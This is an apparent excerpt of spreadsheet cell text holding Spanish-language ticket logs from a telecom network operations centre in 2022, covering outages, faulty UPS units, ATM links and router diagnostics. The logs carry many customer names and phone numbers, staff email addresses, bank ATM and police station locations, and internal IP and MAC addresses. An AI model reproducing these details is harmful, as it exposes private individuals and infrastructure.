  <si>
    <t>**SE LLAMA A CLIENTE FABIAN HERNANDEZ AL 50585888163 NO RESPONDE, ENVIA A BUZON || SE INTENTARA LUEGO **
ID 3001282625
**</t>
  </si>
  <si>
    <t>F4584251</t>
  </si>
  <si>
    <t>SE HABLA A NOHELIA JUAREZ AL NUMERO 47391709, INFORMA QUE SI CUENTAN CON UPS PERO QUE LA CARGA NO SOPORTA MUCHO TIEMPO, AL TERMINO DE 1 O 2 MINUTOS SE VA LA CARGA Y SE QUEDAN SIN SISTEMA, INFORMA QUE YA LO HAN REPORTADO VARIAS VECES PERO AL LLEGAR A REVISAR LES INDICAN QUE EL UPS SE ENCUENTRA EN BUEN ESTADO, ADICIONAL INFORMA QUE EN EL LUGAR ES MUY INESTABLE LA ENERGIA COMERCIAL, A CADA POCO HAY CORTES, Y ASI COMO HOY ESTUVIERON CASI MEDIO DIA SIN ENERGIA INDICA.
ID
3001511653
COLA:
NOMBRE: A: 47391709
NÚMERO: 47391709
DURACIÓN: 0:02:50
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 47391709
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 31/05/2022 18:56:15</t>
  </si>
  <si>
    <t>SE ENVIA CORREO NOTIFICANDO A CLIENTE SOBRE REINICIOS CONSTANTES POR UPS DAÑADO EN PUNTO DE VENTA
KENNY ROBERT RIVERA JUAREZ
ESTIMADO CLIENTE,
CON RESPECTO AL ENLACE PARA EL PUNTO DE VENTA CC_PRONE_GT_SUPER_24_PUERTO_BARRIOS, SOLICITAMOS SU ACOSTUMBRADO APOYO YA QUE EN NUESTRO MONITOREO SE OBSERVAN REINICIOS CONSTANTES SOBRE EL EQUIPO CISCO 867VAE DERIVADO DE LAS FLUCTUACIONES ELÉCTRICAS EN EL LUGAR, SE HABLÓ AL PUNTO REMOTO CON NOELIA JUÁREZ AL NÚMERO 47391709, NOS INFORMA QUE EL UPS QUE TIENEN EN EL LUGAR NO SOPORTA MUCHO TIEMPO LA CARGA, AL CABO DE 1 O 2 MINUTOS QUE SE VA LA ENERGÍA COMERCIAL INDICA QUE SE QUEDAN SIN SISTEMA, POR LO QUE AGRADECERÍA SU APOYO REVISANDO Y REALIZANDO LAS REPARACIONES CORRESPONDIENTES PARA QUE LOS EQUIPOS ESTÉN PROTEGIDOS Y PUEDAN TRABAJAR DE MANERA ADECUADA.
TICKET: F4584251
ID: 86100066
IDENTIFICADOR DEL CLIENTE: CC_PRONE_GT_SUPER_24_PUERTO_BARRIOS
UBICADO EN: SUPER 24 PUERTO BARRIOS ENTRE RIOS COLONIA SAN CRISTOBAL ALDEA ENTRE RIOS PUERTO BARRIOS IZABAL. 15
QUEDO AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>CLIENTE WILSON LUNA RESPONDE QUE SE TRASLADARA LA INFORMACION AL AREA CORRESPONDIENTE
WILSON LUNA &lt;WILSONLUNA@ICASA.COM.GT&gt;
BUENAS NOCHES,
GRACIAS POR LA INFORMACIÓN, PROCEDEREMOS A SOLICITAR EL APOYO AL ÁREA CORRESPONDIENTE.
SALUDOS.</t>
  </si>
  <si>
    <t>F4584258</t>
  </si>
  <si>
    <t>INFORMA CLIENTE WILLIAM MEMBREÑO 74891036 QUE YA ESTÁ DANDO SEGUIMIENTO CON SU EJECUTIVO DE CUENTA PARA EL RETIRO DE AVI A SU E1, AUTORIZA EL CIERRE DEL CASO. ID DE LLAMADA: 3001312095</t>
  </si>
  <si>
    <t>EN LLAMADA CON CLIENTE WILLIAM MEMBREÑO 74891036 INFORMA QUE SOLICITAN QUE SE RETIRE EL AVI A SU E1 POR MOTIVO DE PRUEBAS, SE LE INFORMA QUE LA SOLICITUD LA DEBE REALIZAR CON SU EJECUTIVO DE CUENTA, CLIENTE ENTERADO SE COMUNICARÁ CON SU EJECUTIVO, SOLICITA SE LE LLAME EN 1 HORA.
RESULTADO: LLAMADA HECHA
NOMBRE: 0050374891036
NÚMERO: 0050374891036
INICIO: HOY, 09:03 A. M.
FIN: HOY, 09:11 A. M.
DURACIÓN: 7:51
ID DE LLAMADA: 3001278720</t>
  </si>
  <si>
    <t>F4584262</t>
  </si>
  <si>
    <t xml:space="preserve">				
	WO OPEN                                			8:40:00 A. M.
1/5	RICARDO DE PAZ	78432633	2 HORAS	10:40:00
2/5	HUMBERTO CHIQUILLO	78523419	3 HORAS	11:40:00
3/5	HUMBERTO CHIQUILLO	78523419	4 HORAS	12:40:00
4/5	OSCAR HERNANDEZ	7855-0164	5 HORAS	13:40:00
5/5	JUAN RIVAS 	7606-7202	7 HORAS	15:40:00</t>
  </si>
  <si>
    <t>TECNICO A 1 HORA DE CLIENTE</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JAIME VENTURA 78619879 MENCIONA QUE YA APLICARON LAS PRUEBAS DE PRIMER NIVEL PERO EL SERVICIO NO RESTABLECE
-ID 3001310818
NOMBRE DEL CLIENTE: ALCALDIA MUNICIPAL DE METAPAN
UBICACIÓN:MERCADO CENTRAL DE METAPAN, OFICINA ADMINISTRATIVA
CONTACTO EN SITIO: JAIME VENTURA 78619879
HORARIO DE ATENCION:HASTA LAS 17:00 HRS
GESTIÓN DE PERMISOS: SOLO LLEGAR IDENTIFICADOS</t>
  </si>
  <si>
    <t>F4584266</t>
  </si>
  <si>
    <t>SE CONTACTA WILSON GODOY DEL 30265464 ID 3001293813 PARA EL SEGUIMIENTO DEL TICKET SD1130619 SE VALIDA QUE ESTA EN PC Y NO HAY NADA PENDIENTE, SE CONTACTA CON EL GESTOR JHONNSER.ESCOBAR AL 8126 ID 3001294869 LE INGRESA LA LLAMADA A DARWIN HUSSEIN Y NO REPONDE INGRESA A BUZON, SE LIBERA Y SE VUELVE A CONTACTAR AL 8126 ID 3001294982 INGRESA LA LLAMADA CON LUVIN Y GERSON Y NO RESPONDEN, SE ESCALA CON JUAN MANUEL CARDONA AL 41287321 ID  3001295721 BRINDA EL SOPORTE Y DEJA AL GESTOR EN LINEA Y SE DEJA CON EL CLIENTE.</t>
  </si>
  <si>
    <t>F4584296</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DOUGLAS GARCIA AL 84379213 INDICA QUE EL PROBLEMA ES QUE NO PUEDE INGRESAR AL SERVICIO || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
ID 3001285177
**</t>
  </si>
  <si>
    <t>F4584297</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 5174-5299 CONTESTAN PERO DEJAN EN ESPERA Y NO RETOMAN LLAMADA
 SE INTENTARA LUEGO **
ID 3001287751
**</t>
  </si>
  <si>
    <t>F4584302</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ISMAEL TORREZ AL 83813067 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 3001289294
**</t>
  </si>
  <si>
    <t>F4584303</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 31 DE MAYO DE 2022 10:38
PARA: MARLON ESTUARDO RAMOS &lt;RAMOS.MARLON@CLARO.COM.GT&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; RAMOS LERIZTA ILIANA &lt;IRLERIZT@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 426100013T ::: TICKET CNOC IMBBL004069 ::: "SERVICIO FUERA"
*-*-*-*-*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 (55) 5174 5299 RESPONDE CARLOS MENCIONA QUE ESTARAN COMPARTIENDO EL CONTACTO DE PR POR CORREO
-ID 3001316433</t>
  </si>
  <si>
    <t>F4584310</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE  JORGE ALBERTO LOPEZ / MARCO ALEXANDER AQUIKE 32978807 // 53792576 PERO NO SE TIENE RESPUESTA A NINGUNO DE LOS DOS CONTACTOS, SE LLAMARA NUEVAMENTE EN UNOS MINUTOS
NO SE TIENE LINK DE FO, SIN EMABRGO SE NECESITA CONFIRMAR QUE EL EQUIPO ETX NO SE ENCUENTRE APAGADO Y SI ESTA ALARMADO, ANTES DE ENVIAR PERSONAL TECNICO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE UBICA EQUIPO ETX 1 EL CUAL INDICA QUE ESTA EN EL SIGUIENTE ESTADO PWR - ROJO USER 3 - VERDE, CLIENTE NOS REINICIA EL EQUIPO SIN EMBARGO LAS ALARMAS SIGUEN EN EL MISMO ESTADO, SE LE COMENTA QUE POSIBLEMENTE SEA UN CORTE DE FO Y QUE ES NECESARIO ENVIAR PERSONAL, CLIENTE NOS CONFIRMA QUE NO ES NECESARIO TRAMITAR PERMISOS UNICAMENTE QUE SE ENVIE INFORMACION DEL TECNICO VIA WHATSAPP ADICIOANL PUEDEN LLEGAR A CUALQUEIR HORA
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE MARCO 53792576 PARA VALIDAR EL SERVICIO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4584319</t>
  </si>
  <si>
    <t>SE ENVIO CORREO A CLIENTE
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: MARTES, 31 DE MAYO DE 2022 18:3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DF_CIUDAD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4319
ID: IP2144021SV
IDENTIFICADOR DEL CLIENTE:  CC_BANCO_AGRICOLA_SV_ATM_DF_CIUDAD_BARRIOS
UBICADO EN:  CIUDAD BARRIOSBO. EL CENTROCALLE 21 DE ABRILS/NDESPENSA CIUDAD BARRIOS
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t xml:space="preserve">
ENLACE CONTINUA CAIDO, NO HAY RESPUESTA AL MAIL ENVIADO POR LO QUE SE SOLICITA SEGUIMIENTO VIA MAIL AL CLIENTE
DE: BARBARA ISABEL APARICIO MORALES &lt;BARBARA.APARICIO@CLARO.COM.GT&gt;ENVIADO: VIERNES, 3 DE JUNIO DE 2022 11:10PARA: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@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ASUNTO: RE: ENLACE ALARMADO PARA CLIENTE "CC_BANCO_AGRICOLA_SV_ATM_DF_CIUDAD_BARRIOS"
ESTIMADOS BUEN DIA, SOLICITAMOS DE SU APOYO CON EL SEGUIMIENTO DEL CASO DESCRITO EN EL MAIL QUE ANTECEDE. ENLACE SE ENCUENTRA CAÍDO DESDE HACE 4 DIAS.
DE ANTEMANO, MUCHAS GRACIAS
SALUDOS.
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: JUEVES, 2 DE JUNIO DE 2022 17:0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ASUNTO: RE: ENLACE ALARMADO PARA CLIENTE "CC_BANCO_AGRICOLA_SV_ATM_DF_CIUDAD_BARRIOS"
++
DE: JUAN RODRIGUEZ CRISTOBALENVIADO: MARTES, 31 DE MAYO DE 2022 18:3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DF_CIUDAD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4319
ID: IP2144021SV
IDENTIFICADOR DEL CLIENTE:  CC_BANCO_AGRICOLA_SV_ATM_DF_CIUDAD_BARRIOS
UBICADO EN:  CIUDAD BARRIOSBO. EL CENTROCALLE 21 DE ABRILS/NDESPENSA CIUDAD BARRIOS
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>SE HABLO CON MESA DE AYUDA DE BANCO AGRICOLA, CONTESTO ADAM CHIQUILLO COMENTA QUE NO HAN RECIBIDO REPORTE DEL ATM, SE REENVIO CORREO A CORREO DE MESA DE AYUDA DEL BANCO, INDICA QUE SE REENVIARA A PERSONAL DE MONITOREO PARA QUE SE REVISE EL REPORTE || SE QUEDA AL PENDIENTE DE QUE PERSONAL DE MONITOREO RESPONDAN.
3001962390
COLA:
NOMBRE: A: 50322109500
NÚMERO: 50322109500
DURACIÓN: 0:10:46
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 50322109500
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 2/06/2022 17:07:41
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: JUEVES, 2 DE JUNIO DE 2022 17:0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ASUNTO: RE: ENLACE ALARMADO PARA CLIENTE "CC_BANCO_AGRICOLA_SV_ATM_DF_CIUDAD_BARRIOS"
++
DE: JUAN RODRIGUEZ CRISTOBALENVIADO: MARTES, 31 DE MAYO DE 2022 18:3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DF_CIUDAD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4319
ID: IP2144021SV
IDENTIFICADOR DEL CLIENTE:  CC_BANCO_AGRICOLA_SV_ATM_DF_CIUDAD_BARRIOS
UBICADO EN:  CIUDAD BARRIOSBO. EL CENTROCALLE 21 DE ABRILS/NDESPENSA CIUDAD BARRIOS
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>SE LLAMA A LOS SIGUIENTES TELEFONOS ATM BANCO AGRICOLA SIN TONO || SE LLAMO A ROBERTO DUEÑAS ENVIA A BUZON, SE LLAMARÁ EN OTRO MOMENTO.
3001919783
COLA:
NOMBRE: A: 42971878
NÚMERO: 42971878
DURACIÓN: 0:04:47
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 42971878
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 2/06/2022 14:45:12
3001932675
COLA:
NOMBRE: A: SAN SALVADOR (METROPOLITAN ZONE), EL SALVADOR
NÚMERO: 011 50325148887
DURACIÓN: 0:00:04
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA/404:SIP - NO SE ENCUENTRA]
DETALLES: +50325148887
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 2/06/2022 15:21:24
3001932531
COLA:
NOMBRE: A: SAN SALVADOR (METROPOLITAN ZONE), EL SALVADOR
NÚMERO: 011 50325148887
DURACIÓN: 0:00:07
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA/404:SIP - NO SE ENCUENTRA]
DETALLES: +50325148887
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 2/06/2022 15:21:36
3001932841
COLA:
NOMBRE: A: 50378390806
NÚMERO: 50378390806
DURACIÓN: 0:00:46
ESTADO: CONECTADA
DETALLES: 50378390806
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 2/06/2022 15:21:50
3001932841
COLA:
NOMBRE: A: 50378390806
NÚMERO: 50378390806
DURACIÓN: 0:00:46
ESTADO: CONECTADA
DETALLES: 50378390806
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 2/06/2022 15:21:50</t>
  </si>
  <si>
    <t>F4584326</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALAN HERNANDEZ 41495716 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001399081</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALAN HERNANDEZ 41495716 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001351629</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALAN HERNANDEZ 41495716 NO RESPONDE, SE INTENTARA LUEGO
ID 3001357485
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALAN HERNANDEZ 41495716 MENCIONA QUE PERSISTE EL INCONVENIENTE, SE DEJA EN CONFERENCIA CON GESTOR
-ID 3001291378</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALAN HERNANDEZ AL 41495716 NO RESPONDE, ENVIA A BUZON || SE INTENTARA
 LUEGO**
ID 3001365611
**</t>
  </si>
  <si>
    <t>F4584333</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE HARVEY SANCHEZ AL 85749546 CLIENTE CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 3001292063
**</t>
  </si>
  <si>
    <t>F4584336</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE, A LA ESPERA DE LA RESPUESTA.
DE: CARLOS IVAN PALENCIA FLORES
ENVIADO: LUNES, 6 DE JUNIO DE 2022 16:42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JUAN MANUEL CARDONA SALAMA &lt;JUANM.CARDONA@CLARO.COM.GT&gt;
ASUNTO: ALARMA DEL CAJERO: CC_TYT_GT_ATM2227
ESTIMADO CLIENTE,
SEGÚN LO CONVERSADO TELEFÓNICAMENTE PODRÍAN CONFIRMAR POR ESTE MEDIO SOBRE LA INFORMACIÓN DE BAJA DE ESTE ENLACE, PARA ASÍ PROCEDER CON EL BLOQUEO DEL MONITOREO,
TICKET: F4584336¿¿
ID: 47501882T¿
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATM2227
UBICADO EN:
CAJERO 2227 TEXACO SANTA MARTA, 3 C. 7-00 Z.5 SANTA CRUZ DEL QUICHE, QUICHE
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4584337</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. JOEL PIN 54989547 INFORMA QUE LOGRARON IDENTIFICAR QUE SU SW TIENE EL PUERTO ETH #1 DAÑADO LO CAMBIARON AL PUERTO ETH #2 Y LOGRARON CONECTAR SU LAN, CONFIRMA QUE YA TIENE CONEXION CON SU CENTRAL, ID: 3001342800.
CC_CADISA_GT_COLONIA_FUERTEZA_PUERTOBARRIOSIZABAL#SH INT DESC
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
AT0                            ADMIN DOWN     DOWN
ET0                            ADMIN DOWN     DOWN
FA0                            UP             UP
FA1                            DOWN           DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
FA2                            DOWN           DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
GI0                            DOWN           DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
GI1                            DOWN           DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
GI2                            UP             UP       WAN PRINCIPAL /_/288700045T/_/
LO5                            UP             UP       MONITOREO DEL CNOC
VL1                            UP             UP       LAN DEL CLIENTE
CC_CADISA_GT_COLONIA_FUERTEZA_PUERTOBARRIOSIZABAL#SH ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.72.108.137           1   C4B8.B4DE.16B8  ARPA   GIGABITETHERNET2
INTERNET  10.72.108.140           -   007E.952C.1295  ARPA   GIGABITETHERNET2
INTERNET  192.168.52.21           2   B083.FEB4.9171  ARPA   VLAN1
INTERNET  192.168.52.22           2   E454.E85F.BF04  ARPA   VLAN1
INTERNET  192.168.52.23           3   54BF.649D.009D  ARPA   VLAN1
INTERNET  192.168.52.24           3   509A.4C4B.BC8B  ARPA   VLAN1
INTERNET  192.168.52.25           2   F01F.AF1A.0DC4  ARPA   VLAN1
INTERNET  192.168.52.26           0   705A.0F2E.74BC  ARPA   VLAN1
INTERNET  192.168.52.130          5   5838.7964.E65E  ARPA   VLAN1
INTERNET  192.168.52.222          2   A0BD.1DF4.BDA0  ARPA   VLAN1
INTERNET  192.168.52.254          -   007E.952C.1290  ARPA   VLAN1</t>
  </si>
  <si>
    <t>ENCARGADO DE TURNO JOEL PIN 54989547 NO LOGRO CONECTAR LA LAN AL ROUTER DE CLARO. SE LLAMA A LA CENTRAL EDUARDO GODINEZ 42474587 PERO NO CONTESTA, ID: 3001294611.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. EDUARDO GODINEZ 42474587 NO CONTESTA IVR ENVIA A BUZON, ID: 3001286131.
ENLACE OPERATIVO A NIVEL WAN, CLIENTE TIENE QUE CONECTAR SU LAN AL ROUTER DE CLARO.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ENCARGADO DE TURNO JOEL PIN 54989547 PROCEDE A REVISAR SUS CONEXIONES Y EQUIPOS INTERNOS ...  ID: 3001286451</t>
  </si>
  <si>
    <t>F4584343</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE JULIO GARCÍA 77422406 PERO NO CONTESTA Y ENVÍA A BUZÓN, POSIBLEMENTE YA SE RETIRO DE LA ALCALDÍA, SE DARÁ SEGUIMIENTO EL DÍA DE MAÑANA A LAS 9:00 AM
3001721150
3001722152
3001723263</t>
  </si>
  <si>
    <t>DEBIDO A CONDICIONES CLIMÁTICAS ADVERSAS NO SE PUDO SEGUIR CON LAS REPARACIONES, SE REPROGRAMO LA VISITA PARA EL DÍA DE MAÑANA A PARTIR DE LAS 8:00 AM</t>
  </si>
  <si>
    <t>F4584345</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CRISTOBAL COCHE 55176867 MENCIONA QUE PERSISTE LA CAIDA, DESCONOCE SI EN LA MADRUGADA PRESENTARON ALGUN APAGON DE ENERGIA
CLIENTE MENCIONA QUE YA APLICARON REINICIO PERO NO RESTABLECE,  SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 3001319706</t>
  </si>
  <si>
    <t>F4584349</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE REINA AL 8209-0516 INDICA QUE AUN NO CUENTA CON SERVICIO || SE NOTIFICA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
ID 3001611123
**</t>
  </si>
  <si>
    <t>F4584352</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 22437253 MENCIONA QUE EL SERVICIO YA ESTA OPERATIVO PERO SOLICITA EL MOTIVO DE LA CAIDA
SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 3001340673</t>
  </si>
  <si>
    <t>F4584353</t>
  </si>
  <si>
    <t>SE LE LLAMA A OTTONIEL LOPEZ 42120936 ID: 3001346237 / CL COMENTA QUE VERIFICARA PROBLEMA INTERNO, SI TIENE ALGUN INCONVENIENTE ADICIONAL SE COMUNICARA, AUTORIZA CIERRE DDE TKT | SE NOTIFICA A WAGNER.POLANCO VIA SKYPE | WIP</t>
  </si>
  <si>
    <t>F4584355</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CESAR HUMBERTO OSORIO  56997320 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001289821</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FERNANDO AYALA 58656674 MENCIONA QUE PR SIGUE REPORTANDO CAIDA TOTAL
-ID 3001234564</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CESAR HUMBERTO OSORIO 56997320 SE LE INDICA QUE A NIVEL DE CLARO EL SERVICIO ESTA FUNCIONANDO CORRECTAMETE PERO NO SE TIENEN EQUIPOS ASOCIADOS
CLIENTE MENCIONA QUE ESTARA ESCALANDO EL CASO CON LA CENTRAL
-ID 3001295582 -  3001297711</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FERNANDO AYALA 58656674 RESPONDE CARLOS MENCIONA QUE ESTARA VALIDANDO CON PR POR LO QUE SOLICITA LLAMADA EN 5 MIN
-ID 3001290155</t>
  </si>
  <si>
    <t>F4584360</t>
  </si>
  <si>
    <t>SE LLAMA A REINA YOL 58261421 MENCIONA QUE KATY DAVILA (EJECUTIVA DE VENTAS) YA ESTA DANDO SEGUIMIENTO CON   CONSULTORIA, INDICA QUE PODRIAN TENER AVANCES EN EL TRANSCURSO DE LA SEMANA
MENCIONA QUE PODRIAN ENVIAR CORREO CON AVANCES O LLAMAR L VIERNES
-ID 3001360949</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JORGE RAMOS 30368203 PARA BRINDAR RETROALIMENTACION
-ID 3001363136</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JORGE RAMOS 30368203 CLIENTE MENCIONA QUE NO HA TENIDO RESPUESTA DE NINGUNA MANERA POR PARTE DE LA EJECUTIVA
CLIENTE INDICA QUE NO SE PUEDE CERRAR EL TICKET HASTA QUE LE DEN UNA SOLUCION
-ID 3001357024</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JORGE RAMOS 30368203 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001347988</t>
  </si>
  <si>
    <t>SE LLAMO A CLIENTE JORGE RAMOS 30368203 RESPONDE PERO INDICA QUE NO ESCUCHA SE LE INDICA QUE SE LE DEVOLVERA LLAMADA SE LLAMA NUEVAMENTE PERO NO RESPONDE**
ID 3001342896 - 3001343206
**</t>
  </si>
  <si>
    <t>F4584362</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RENE ARGUETA  70737919 MENCIONA QUE HACE 3 DIAS PRESENTARON VARIOS APAGONES DE ENERGIA Y DESDE ENTONCES TIENEN CAIDA TOTAL
-ID 3001305348
NOMBRE DEL CLIENTE:  POLICIA NACIONAL CIVIL
UBICACIÓN:BARRIO EL CENTRO MUNICIO DE ARAMBALA MORAZAN
CONTACTO EN SITIO:PERSONAL DE TURNO
HORARIO DE ATENCION:24/7
GESTIÓN DE PERMISOS: UNICAMENTE IDENTIFICADOS</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RENE ARGUETA 70737919 PARA BRINDAR RETROALIMENTACION
-ID 3001338556</t>
  </si>
  <si>
    <t>F4584368</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DANIEL MIRANDA AL  30017442/ 79482092 CONTESTA LA SEÑORITA MELINA CUADRA E INDICA QUE EL CLIENTE NO HA LLEGADO PERO QUE EL SERVICIO ESTA ESTABLE Y OPERATIVO **
ID 3001339780 - 3001340264
**</t>
  </si>
  <si>
    <t>F4584373</t>
  </si>
  <si>
    <t>SE LLAMA AL GDN INGRESA LA LLAMADA AL IVR Y COMPLETA
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4584377</t>
  </si>
  <si>
    <t>SET IENE A LCIENTE NUEVAMENTE EN LNIEA- SE DIRIGE HACIA EQUIPOS
3001305445
COLA:
NOMBRE: A: 58865708
NÚMERO: 011 50258865708
DURACIÓN: 0:00:10
ESTADO: CONECTADA
DETALLES: +50258865708
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 31/05/2022 10:12:52</t>
  </si>
  <si>
    <t>SE TIENE A CLIENTE EN LINEA- MARIELA VELASQUEZ-22193229
3001299394
COLA:
NOMBRE: A: 22193229
NÚMERO: 22193229
DURACIÓN: 0:00:35
ESTADO: CONECTADA
DETALLES: 22193229
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 31/05/2022 09:57:42</t>
  </si>
  <si>
    <t>F4584390</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE YARIL HERNANDEZ AL 70692921 INDICA QUE AUN PERSISTE EL INCONVENIENTE QUE NO AL MOMENTO DE REALIZAR LLAMADA A ELLOS SI ESCUCHAN PERO LA OTRA PERSONA NO || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
ID 3001371661
**</t>
  </si>
  <si>
    <t>SE HABLA CON EL CLIENTE QUIEN COMENTA QUE EL INCONVENIENTE PERSISTE, PERSONA QUE LLAMA AL GDN ESCUCHA PERO DEL OTRO LADO NO SE ESCUCHA. INDICA QUE TIENE LA LINEA ANALOGA 22983033 DONDE REDIRIGEN EL TRÁFICO HACIA EL GDN 22507300.</t>
  </si>
  <si>
    <t>CLIENTE EUGENIA MENDEZ 70692921 INDICA QUE PRESENTA PERDIDA DE AUDIO EN LAS LLAMADAS. SE LE SOLICITA APOYO PARA UBICAR SU EQUIPO ASMI52, LO ENCUENTRA SINCRONIZADO CON PWR VERDE Y SYNC VERDE. SE LE SOLICITA SU APOYO PARA UBICAR SU PLANTA PBX PERO NO LO LOGRA UBICAR. CLIENTE SOLICITA VISITA TÉCNICA.</t>
  </si>
  <si>
    <t>F4584403</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE QUIEN VALIDA QUE PATCHCORD ENTRE ETX1 Y ROUTER ESTABA DESCONECTADO, SE VUELVE A CONECTAR Y ENLACE LEVANTA NUEVAMENTE
1001573417
COLA:
NOMBRE: A: 46267304
NÚMERO: 46267304
DURACIÓN: 0:13:30
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 46267304
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MONICAMARROQUIN
FECHA Y HORA LOCALES: 6/06/2022 13:29:30</t>
  </si>
  <si>
